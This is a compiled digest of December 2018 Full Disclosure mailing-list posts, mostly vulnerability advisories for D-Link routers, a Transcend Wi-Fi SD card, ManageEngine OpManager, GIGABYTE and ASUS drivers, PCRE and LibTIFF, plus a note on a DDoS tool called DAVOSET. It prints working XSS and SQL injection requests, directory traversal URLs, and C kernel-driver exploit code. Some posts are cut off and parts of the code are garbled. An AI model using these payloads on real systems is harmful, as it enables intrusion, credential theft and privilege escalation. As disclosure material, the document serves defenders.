Re: [FD] LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)

[Henri Salo]

On Thu, Dec 20, 2018 at 09:03:08AM +0800, zzt0907 wrote:
> # LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)
> https://github.com/shelltdf/libtiff/commit/25f9ffa56548c1846c4a1f19308b7f561f7b1ab0

I'm curious why do you post about minor memory leak after over year from fix,
from old version and tool (not the library)? Also note that
http://www.libtiff.org/tools.html says "Many of them however are more intended
to serve as programming examples for using the TIFF library."

You might want to test the latest version of the library. Their git can be
found from https://gitlab.com/libtiff/libtiff.

-- 
Henri Salo

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CVE-2018-18009] dirary0.js on D-Link DIR-140L, DIR-640L devices allows remote unauthenticated attackers to discover admin credentials

[Tyler Cui]

[Vendor]
us.dlink.com


[Product]
DIR-140L (version 1.02)
DIR-640L (version 1.01RU)
Other versions might also be affected.


[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18009


[Security Issue]
An authenticated user can visit the file dirary0.js, for example, 
http://victime_ip/dirary0.js, and obtain clear text password of user admin at 
the line:

gosave_ok = ("__password__".length < 6)?true:false

[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CVE-2018-18008] spaces.htm on multiple D-Link devices (DSL, DIR, DWR) allows remote unauthenticated attackers to discover admin credentials

[Tyler Cui]

[Vendor]
us.dlink.com


[Product]
D-Link DSL-2770L (version ME_1.01, ME_1.02, AU_1.06)
D-Link DIR-140L, DIR-640L (version 1.00, 1.01RU, 1.02)
D-Link DWR-116, DWR-512, DWR-555, DWR-921 (version V1.03, V1.05, V2.01, V2.02)

[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18008


[Security Issue]
An authenticated user can visit the page spaces.htm, for example, 
http://victime_ip/spaces.htm, and obtain clear text password of user admin at 
the line:

xxx="__password__";

[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CVE-2018-18007] atbox.htm on D-Link DSL-2770L devices allows remote unauthenticated attackers to discover admin credentials

[Tyler Cui]

[Vendor]
us.dlink.com


[Product]
D-Link DSL-2770L (version ME_1.01, ME_1.02, AU_1.06)


[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18007


[Security Issue]
An authenticated user can visit the page atbox.htm, for example, 
http://victime_ip/atbox.htm, and obtain clear text password of user admin at 
the line:

else if(ff.curpd.value != "__password__") location="atbox_pd.htm"


[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2018-20211 - DLL Hijacking in Exiftool v8.3.2.0

[Rafael Pedrero]

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2018-20193 - Privilege escalation in Juniper Secure Access SSL VPN - SA-4000, 5.1R5 (build 9627) 4.2 Release (build 7631)

[Rafael Pedrero]

In 2006...



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DAVOSET v.1.3.7

[MustLive]

Hello participants of Mailing List.

Since announcement of DAVOSET in 2010 and all releases, I've made next
update of the software. Recently DAVOSET v.1.3.7 was released - DDoS attacks
via other sites execution tool (http://websecurity.com.ua/davoset/).

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

GitHub: https://github.com/MustLive/DAVOSET

Download DAVOSET v.1.3.7:

http://websecurity.com.ua/uploads/2018/DAVOSET_v.1.3.7.rar

In new version there was added verbose mode and added SSRF vulnerability in
Microsoft Forefront Unified Access Gateway 2010. Also there were added new
services into full list of zombies, changed default settings and removed
non-working services from full list of zombies.

In total there are 205 zombie-services in the list.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] New vulnerabilities in Transcend Wi-Fi SD Card

[MustLive]

Hello list!

There are Directory Traversal and Cross-Site Request Forgery vulnerabilities
in Transcend Wi-Fi SD Card.

-
Affected products:
-

Vulnerable is the next model: Transcend Wi-Fi SD Card 16 GB, Firmware v.1.8.
This model with other firmware versions and other Transcend models also can
be vulnerable. Transcend didn't answer will they fix these and other holes.

--
Details:
--

There are two modes of connection to the flash card: Direct Share and
Internet Mode. In the first mode device with Wi-Fi is connected to this
card, and in the second mode the card itself is connected to Wi-Fi devices
(access point, router or smartphone with enabled Personal Hotspot) - then
all computers on the LAN will have access to it. All mentioned attacks work
in both modes.

Address 192.168.0.70 - it's dynamic IP, that is assigned in second mode of
work (DHCP at router or AP), the address will change. So it must be found
first for attack. Like with IP scanning or in router's stats.

Directory Traversal (WASC-33):

Reading list of directories:

http://192.168.0.70/cgi-bin/show_pic.cgi?dir=/etc
http://192.168.0.70/cgi-bin/show_video.cgi?dir=/etc
http://192.168.0.70/cgi-bin/file_list.pl?dir=/www/sd/../../etc

Directory Traversal (WASC-33):

Arbitrary files disclosure:

http://192.168.0.70/cgi-bin/wifi_download?fn=wsd.conf=/www/sd/../mtd/config

This is configuration file with logins and passwords to admin panel, to
flash card itself via Wi-Fi and to access point (Wi-Fi router).

Cross-Site Request Forgery (WASC-09):

Among multiple CSRF vulnerabilities in admin panel there is attack for
remote login: In login process there is no captcha, so besides lack of
protection against BF, also CSRF attack can be made. It's possible to
remotely enter into admin panel (with default login and password) for
conducting further CSRF attacks.

http://admin:admin@192.168.0.70;>


Timeline:


2014.05.10 - found vulnerabilities in Transcend Wi-Fi SD Card 16 GB.
2015.08.01 - announced at my site. Later informed developers. They thanked,
but didn't answer will they fix these vulnerabilities.
2017.01.28 - disclosed previous vulnerabilities at my site.
2017.03.28 - announced new vulnerabilities.
2017.04.02 - informed developers. They didn't answer.
2018.05.12 - disclosed at my site (http://websecurity.com.ua/8533/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Zoho ManageEngine OpManager 12.3 before build 123239 allows XSS in the Notes column of the Alarms section

[Murat Aydemir]

I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before build 123239 allows XSS in the
Notes column of the Alarms section

II. CVE REFERENCE
-
CVE-2018-20339

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
20/12/2018 OPManager replay that they fixed

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product(version 12.3) was vulnerable to stored
xss attacks. A successfully exploit of this attack could allow thief
users sessions or arbitrary interpret javascript code on remote host.
References: https://www.manageengine.com/network-monitoring/help/read-me.html,
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
POST 
/api/json/alarm/addNotes?apiKey=5f5e26abc7bf2af2a5669cf258ec8385=true
HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost/apiclient/ember/index.jsp
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: JSESSIONID=DF47AA5596862216FF9BBBAE234975C1;
encryptPassForAutomaticSignin=82a3161ad68e57b6;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator;
opmcsrfcookie=5bb7df90-d1a4-4942-ae64-e5308fb5d501;
f2RedirectUrl=http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FAlarms%2FAlarm%2FDetails%2Fk_192.168.252.150_URL_Poll;
NFA__SSO=57D7F0938B20457F49BB1791E756CAC3
DNT: 1
Connection: close

notes=aabbcc%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_notes_parameter')%2F%2F=k_192.168.252.150_URL_Poll

-- 









Bu mesaj ve ekleri, mesajda 
gönderildiği belirtilen 
kişi/kişilere özeldir ve gizlidir. Bu mesaj 
herhangi bir amaç için 
çoğaltılamaz, dağıtılamaz ve yayınlanamaz. 
Mesajın gönderildiği kişi 
değilseniz, mesaj içeriğini ya da eklerini 
kopyalamayınız, yayınlamayınız 
ya da başka kişilere yönlendirmeyiniz ve 
mesajı gönderen kişiyi derhal 
uyararak bu mesajı siliniz. Şirketimiz, 
mesajın içeriğinin ve eklerinin 
size değişikliğe uğrayarak veya geç 
ulaşmasından; gizliliğinin 
korunmamasından; virüs içermesinden ve 
bilgisayar sisteminize verebileceği 
herhangi bir zarardan sorumlu 
değildir


This message and its 
attachments 
are confidential and intended solely for the recipient(s) 
stated therein. 
This message cannot be copied, distributed or published 
for any purpose. 
If you are not the intended recipient, please do not 
copy, publish or 
forward the information existing in the content and 
attachments of this 
message. In such case please notify the sender 
immediately and delete all 
the copies of the message. Our company shall 
have no liability for any 
changes in or late receiving of the message, 
loss of integrity and 
confidentiality, viruses and any damages caused in
 anyway to your computer 
system based on this message.


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Zoho ManageEngine OpManager 12.3 before build 123239 allows SQL injection in the Alarms section

[Murat Aydemir]

I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before build 123239 allows SQL
injection in the Alarms section

II. CVE REFERENCE
-
CVE-2018-20338

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
20/12/2018 OPManager replay that they fixed

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product(version 12.3) was vulnerable to SQL
Injection attacks. A successfully exploit of this attack could allow
arbitrary code execution or unauthenticated access in databases
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
GET 
/api/json/alarm/listAlarms?isFluidic=true=true=5f5e26abc7bf2af2a5669cf258ec8385=ActiveAlarms=true=true&_search=true=1539945434261=100=1=modTime=desc=%7b%22groupOp%22%3a%22AND%22%2c%22rules%22%3a[%7b%22field%22%3a%22message%22%2c%22op%22%3a%22cn%22%2c%22data%22%3a%22test78275719'%20or%201268%3d1268--%20%22%7d]%7d&_=1539935356081
HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost/apiclient/ember/index.jsp
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=X; encryptPassForAutomaticSignin=X;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=X;
opmcsrfcookie=X
DNT: 1
Connection: close

-- 









Bu mesaj ve ekleri, mesajda 
gönderildiği belirtilen 
kişi/kişilere özeldir ve gizlidir. Bu mesaj 
herhangi bir amaç için 
çoğaltılamaz, dağıtılamaz ve yayınlanamaz. 
Mesajın gönderildiği kişi 
değilseniz, mesaj içeriğini ya da eklerini 
kopyalamayınız, yayınlamayınız 
ya da başka kişilere yönlendirmeyiniz ve 
mesajı gönderen kişiyi derhal 
uyararak bu mesajı siliniz. Şirketimiz, 
mesajın içeriğinin ve eklerinin 
size değişikliğe uğrayarak veya geç 
ulaşmasından; gizliliğinin 
korunmamasından; virüs içermesinden ve 
bilgisayar sisteminize verebileceği 
herhangi bir zarardan sorumlu 
değildir


This message and its 
attachments 
are confidential and intended solely for the recipient(s) 
stated therein. 
This message cannot be copied, distributed or published 
for any purpose. 
If you are not the intended recipient, please do not 
copy, publish or 
forward the information existing in the content and 
attachments of this 
message. In such case please notify the sender 
immediately and delete all 
the copies of the message. Our company shall 
have no liability for any 
changes in or late receiving of the message, 
loss of integrity and 
confidentiality, viruses and any damages caused in
 anyway to your computer 
system based on this message.


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection via the getGraphData API

[Murat Aydemir]

I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection
via the getGraphData API.

II. CVE REFERENCE
-
CVE-2018-20173

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
17/12/2018 OPManager replay that they fixed

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product(version 12.3) was vulnerable to SQL
Injection attacks. A successfully exploit of this attack could allow
arbitrary code execution or unauthenticated access in databases
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
GET 
/api/json/v2/device/getGraphData?name=192.168.252.150=WMI-MemoryUtilization=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11=Today=true=XX&_=1539935355622
HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost.com/apiclient/ember/index.jsp
OPMCurrentRoute:
http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=XXX; encryptPassForAutomaticSignin=XXX;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=X;
opmcsrfcookie=X
DNT: 1
Connection: close

-- 









Bu mesaj ve ekleri, mesajda 
gönderildiği belirtilen 
kişi/kişilere özeldir ve gizlidir. Bu mesaj 
herhangi bir amaç için 
çoğaltılamaz, dağıtılamaz ve yayınlanamaz. 
Mesajın gönderildiği kişi 
değilseniz, mesaj içeriğini ya da eklerini 
kopyalamayınız, yayınlamayınız 
ya da başka kişilere yönlendirmeyiniz ve 
mesajı gönderen kişiyi derhal 
uyararak bu mesajı siliniz. Şirketimiz, 
mesajın içeriğinin ve eklerinin 
size değişikliğe uğrayarak veya geç 
ulaşmasından; gizliliğinin 
korunmamasından; virüs içermesinden ve 
bilgisayar sisteminize verebileceği 
herhangi bir zarardan sorumlu 
değildir


This message and its 
attachments 
are confidential and intended solely for the recipient(s) 
stated therein. 
This message cannot be copied, distributed or published 
for any purpose. 
If you are not the intended recipient, please do not 
copy, publish or 
forward the information existing in the content and 
attachments of this 
message. In such case please notify the sender 
immediately and delete all 
the copies of the message. Our company shall 
have no liability for any 
changes in or late receiving of the message, 
loss of integrity and 
confidentiality, viruses and any damages caused in
 anyway to your computer 
system based on this message.


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Capstone disassembler v4.0 is out!

[Nguyen Anh Quynh]

Greetings,

We are super excited to announce version 4.0 of Capstone disassembler
framework!

Exactly 5 years ago, on December 18th of 2013, we published the first
version. Today, this release 4.0 marks 5 years of our project! Such a long
journey, which is impossible without huge community support!

In no particular order, we would like to thank Thinkst Canary
, NowSecure , ECQ
, Senrio , GracefulBits
 & Catena Cyber  for
sponsoring this release!

We also wish to express our sincere gratitude to all contributors &
donators, who generously supported us to maintain Capstone project!

More details are available at http://capstone-engine.org/Version-4


(For those who do not know, Capstone is an open source multi-arch,
multi-platform disassembly engine, with homepage at
http://capstone-engine.org)

Thanks,
Quynh

http://www.keystone-engine.org
http://www.capstone-engine.org
http://www.unicorn-engine.org

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CORE-2018-0007] - GIGABYTE Driver Elevation of Privilege Vulnerabilities

[advisories]

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

GIGABYTE Drivers Elevation of Privilege Vulnerabilities

*1. *Advisory Information**

Title: GIGABYTE Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0007
Advisory URL:
http://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Gigabyte
Release mode: User release

*2. *Vulnerability Information**

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

*3. *Vulnerability Description**

GIGABYTE's website states that[1]:

Founded in 1986, GIGABYTE is committed to providing top-notch solutions
that "upgraded your life". We are regarded as a pioneer in innovation
with groundbreaking excitements such as Ultra Durable, WINDFORCE, and
BRIX series. We have also invented a premium gaming brand AORUS, a full
spectrum of gaming products for gamers and enthusiast. GIGABYTE has
continuously brought unique new ways of digital world and created
marvelous products that empower you with meaningful and charming
experiences.

Multiple vulnerabilities were found in the GPCIDrv and GDrv drivers as
bundled with several GIGABYTE and AORUS branded motherboard and graphics
card utilities, which could allow a local attacker to elevate privileges.
*
**4. *Vulnerable Packages**

   . GIGABYTE APP Center v1.05.21 and previous
   . AORUS GRAPHICS ENGINE v1.33 and previous
   . XTREME GAMING ENGINE v1.25 and previous
   . OC GURU II v2.08

Other products and versions might be affected, but they were not tested.

*5. *Vendor Information, Solutions and Workarounds**

The vendor did not provide fixes or workaround information.

*6. *Credits**

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.

*7. *Technical Description / Proof of Concept Code**

GYGABYTE App Center, RGBFusion, Xtreme Engine, AORUS Graphics Engine,
etc. use low level drivers to program and query the status on several
embedded ICs on their hardware. Fan curves, clock frequencies, LED
colors, thermal performance, and other user customizable properties and
monitoring functionality are exposed to applications through these low
level kernel drivers.

The main subject of this advisory are two of the device drivers
installed/loaded by affected GIGABYTE utilities (GPCIDrv and GDrv). From
now on addressed as "GPCI" and "GIO". Default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to these drivers.

The following sections describe the problems found.

*7.1. *Arbitrary ring0 VM read/write**

[CVE-2018-19320]
There is ring0 memcpy-like functionality built into GIO's IOCTL
0xC3502808, allowing a local attacker to take complete control of the
affected system.

Proof of Concept:

/-
// GIGABYTE PoC demonstrating non-pivileged R/W access to abritrary
virtual memory

#include 
#include 

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MemCpyStruct {
    ULONG64 dest;
    ULONG64 src;
    DWORD size;
} GIO_MemCpyStruct;

#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
    GIO_MemCpyStruct mystructIn = { dest, src, size};
    BYTE outbuffer[0x30] = { 0 };
    DWORD returned = 0;

    DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID),
sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), & returned, NULL);
    if (returned) {
    return TRUE;
    }
    return FALSE;
}

BOOL InitDriver()
{
    char szDeviceNames[] = ".\\GIO";
    ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
    printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n",
szDeviceNames, GetLastError());
    return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    if (!InitDriver()) {
    exit(0);
    }
    printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
    printf("press ENTER for instant BSOD\n");
    getchar();
    ULONG64 data = 0x;
    GIO_memcpy(0, (ULONG64), 8);
    CloseHandle(ghDriver);

    return 0;
}
-/

*7.2. *Port mapped I/O access**

[CVE-2018-19322]
Both GPCI and GIO expose functionality to read/write data from/to IO
ports. This could be leveraged in a number of ways to ultimately run
code with elevated privileges.
   

Proof of Concept:

/-
// GIGABYTE PoC demonstrating 

[FD] [CORE-2017-0012] - ASUS Drivers Elevation of Privilege Vulnerabilities

[advisories]

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASUS Drivers Elevation of Privilege Vulnerabilities

*1. *Advisory Information**

Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release

*2. *Vulnerability Information**

Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535

*3. *Vulnerability Description**

ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.

Multiple vulnerabilities were found in the GLCKIo and Asusgio drivers
installed by ASUS Aura Sync, which could allow a local attacker to
elevate privileges.

*4. *Vulnerable Packages**

. ASUS Aura Sync v1.07.22 and previous versions
Other products and versions might be affected, but they were not tested.

*5. *Vendor Information, Solutions and Workarounds**

The vendor did not provide fixes or workaround information.

*6. *Credits**

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.

*7. *Technical Description / Proof of Concept Code**

Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).

The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application. From now on addressed as
"Asusgio" and "GLCKIo". Default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.

The following sections describe the problems found.

*7.1. *Arbitrary ring0 write**

[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo leading to write of arbitrary DWORD to an arbitrary address.

/-
.text:F800B09F13FE loc_F800B09F13FE:
.text:F800B09F13FE mov rax, [rsp+0C8h+var_38]  
; CONTROLLED VALUE
.text:F800B09F1406 mov ecx, [rsp+0C8h+var_56]  
; CONTROLLED VALUE
.text:F800B09F140A mov [rax], ecx  
; Arbitrary DWORD sized write!
.text:F800B09F140C mov rax, [rsp+0C8h+Irp]
.text:F800B09F1414 mov qword ptr [rax+38h], 4
.text:F800B09F141C jmp short loc_F800B09F142D
-/

Proof of Concept:
/-
#include 
HANDLE ghDriver = 0;

#define IOCTL_GLCKIO_VMWRITE 0x80102050

typedef struct _STRUCT_GLCKIO_VMWRITE {
    WORD unk0;
    DWORD unk1_1;
    WORD unk1_2;
    ULONG64 unk2;
    ULONG64 unk3;
    ULONG64 unk4;
    ULONG64 unk5;
    ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;

BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
    STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
    mystructIn.unk0 = 0xf11;
    mystructIn.unk1_1 = value;    // value
    mystructIn.unk5 = dest;        // address

    STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };

    DWORD returned = 0;

    DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID),
sizeof(mystructIn), (LPVOID), sizeof(mystructOut),
, NULL);
    return BOOL(returned);
}

BOOL InitDriver()
{
    ghDriver = CreateFile(".\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
    printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
GetLastError());
    return FALSE;
    }
    return TRUE;
}

int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");

    if (!InitDriver()) {
    exit(0);
    }

    printf("press ENTER for instant BSOD\n");
    getchar();
    ArbitraryWriteDWORD(0, 0x);

    CloseHandle(ghDriver);
    return 0;
}
-/

*7.2. *Port mapped I/O access**

[CVE-2018-18536]
Both GLCKIo and Asusgio expose a functionality to read/write data
from/to IO ports. This could be leveraged in a number of ways to
ultimately run code with elevated privileges.

/-
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this 

[FD] Buffer Overflow in function match() PCRE 8.41 (CVE-2017-16231)

[zzt0907]

# Buffer Overflow in function match() PCRE 8.41 (CVE-2017-16231)
## Product Download: https://sourceforge.net/projects/pcre/files/pcre/
## Vulnerability Type??Buffer Overflow
## Attack Type : local
## Vulnerability Description
a pcretest load test PoC produces a crash overflow in the function match() in 
pcre_exec.c because of a self-recursive call
> file:pcre_exec.c
> function match() line 983 and line 2061
## POC
https://github.com/followboy1999/poc/tree/master/CVE-2017-16231
./pcretest pcre_poc.txt
## Versions:PCRE 8.41
## Impact:Denial of Service
## Credit
This vulnerability was discovered by Jiawang Zhang Coordination Center of China 
(CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16231

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)

[zzt0907]

#CVE-2017-16232
# LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)
## Product Download: http://www.libtiff.org/ http://download.osgeo.org/libtiff/
## Vulnerability Type??memory leak
## Attack Type : local
## Vulnerability Description
LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow
attackers to cause a denial of service (memory consumption), as demonstrated
by tif_open.c, tif_lzw.c, and tif_aux.c
## POC
https://github.com/followboy1999/poc/tree/master/CVE-2017-16232

./tiff2bw libtiff_poc.tif 222.tif
 LZWDecode: Not enough data at scanline 0 (short 6442443006 bytes).
> /usr/local/bin/llvm-symbolizer: /lib/x86_64-linux-gnu/libtinfo.so.5: no 
> version information available (required by /usr/local/bin/llvm-symbolizer)
> 
> =
> ==25328==ERROR: LeakSanitizer: detected memory leaks
> 
> Direct leak of 6442451106 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
> #1 0x4e88be in main 
> /home/zzt/Fuzzing/Victims/ASAN/tiff-4.0.8/tools/tiff2bw.c:258:28
> #2 0x7f293f0fdabf in __libc_start_main 
> /build/glibc-qbmteM/glibc-2.21/csu/libc-start.c:289
> 
> Direct leak of 1137 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
